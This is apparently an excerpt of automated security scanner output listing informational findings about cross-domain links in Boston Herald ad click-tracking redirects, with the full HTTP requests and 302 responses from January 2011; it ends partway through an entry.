Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=181134647?
Content-Length: 594
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=181134647?">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1852599113/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1852599113/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x

The response contains the following link to another domain:

http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1852599113/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857
Content-Length: 342
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2058755968/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2058755968/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x

The response contains the following link to another domain:

http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2058755968/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857
Content-Length: 342
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=2097867578?

The response contains the following link to another domain:

http://a.collective-media.net/jump/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=2097867578?

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=2097867578? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=2097867578?
Content-Length: 597
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=2097867578?">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2124335020/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2124335020/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x

The response contains the following link to another domain:

http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2124335020/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857
Content-Length: 342
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438?

The response contains the following link to another domain:

http://a.collective-media.net/jump/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438?

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438?
Content-Length: 599
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438?">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797?

The response contains the following link to another domain:

http://a.collective-media.net/jump/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797?

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:07:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797?
Content-Length: 595
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797?">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/371110779/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/371110779/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x

The response contains the following link to another domain:

http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/371110779/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857
Content-Length: 342
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226?

The response contains the following link to another domain:

http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226?

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:07:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226?
Content-Length: 594
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226?">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=454587819?

The response contains the following link to another domain:

http://a.collective-media.net/jump/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=454587819?

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=454587819? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=454587819?
Content-Length: 597
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=454587819?">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=710762294?

The response contains the following link to another domain:

